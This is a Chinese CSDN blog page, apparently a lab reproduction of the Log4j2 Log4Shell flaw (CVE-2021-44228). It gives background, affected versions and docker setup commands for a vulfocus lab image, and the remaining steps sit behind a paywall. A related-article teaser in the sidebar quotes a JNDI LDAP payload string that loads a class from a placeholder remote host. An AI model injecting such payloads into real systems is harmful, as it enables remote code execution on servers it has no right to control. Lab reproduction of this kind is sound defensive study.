(CVE-2021-44228)Apache log4j 远程命令执行

已于 2022-08-13 00:39:03 修改
阅读量4k 收藏 2
点赞数 2
分类专栏: Web漏洞 中间件漏洞 漏洞复现 文章标签: apache 安全 java web安全 网络安全
于 2021-12-19 21:26:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/122030313
版权

漏洞简介

Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。
Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用中,从而造成RCE(远程代码执行)。

影响版本

Apache Log4j 2.x < 2.15.0-rc2

环境搭建

docker pull vulfocus/log4j2-rce-2021-12-09					#拉取漏洞镜像

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wJ5jyPG0-1639919975004)(log4j_rce.assets/image-20211219064800396.png)]

docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09		#开启环境

了解本专栏 订阅专栏 解锁全文 超级会员免费看
carefree798
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
Log4j2远程代码执行漏洞(CVE-2021-44228
wangzhifei1的博客
01-16 1738
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Apache SSI远程命令执行漏洞
最新发布
weixin_74020633的博客
05-03 986
Apache SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。从技术层面来讲,SSI是一种在静态的shtml文件中根据需求插入内容;SSI其实是一套为web服务器提供的命令,指令的基本格式为:<!--指令名称="指令内容"-->指令名称指令作用#include将文本文件的内容直接插入到文档页面中#echo将环境变量插入到页面中。
Log4j2远程命令执行CVE-2021-44228
weixin_48817799的博客
01-25 1068
Log4j2远程命令执行CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
log4j2 远程代码执行漏洞复现(CVE-2021-44228
Welcome To Myon'Blog !
03-08 3565
log4jApache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1233
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Log4J2远程代码执行漏洞复现(CVE-2021-44228
box
04-18 8310
Log4J代码执行漏洞复现(CVE-2021-44228) 受影响版本log4j版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 受影响的应用及组件:Apache Solr、Apache Struts2、Apache Flink、Apache Druid、spring-boot-strater-log4j2、ElasticSearch、Apache Flume、Dubbo、Redis、Logstash、Apache Kafka等 复现环境:java ver
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6303
漏洞说明 Log4jApache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
安全漏洞:Apache Log4j2 远程代码执行漏洞(CVE-2021-44228
简单记录
09-02 2010
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)解决方法
Log4j2安全 JNDI漏洞 CVE-2021-44228
Keep learing, and stay fast
12-15 1557
12 月 10 日,Apache 开源项目 Log4j远程代码执行漏洞(CVE-2021-44228) 被公开
log4j-api-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)2.15.0-rc2版本(jar包名称仍为2.15.0,源码编译出来的)
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 270
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6346
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2668
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2367
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
03-07
这是一个安全漏洞问题,我可以回答。elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值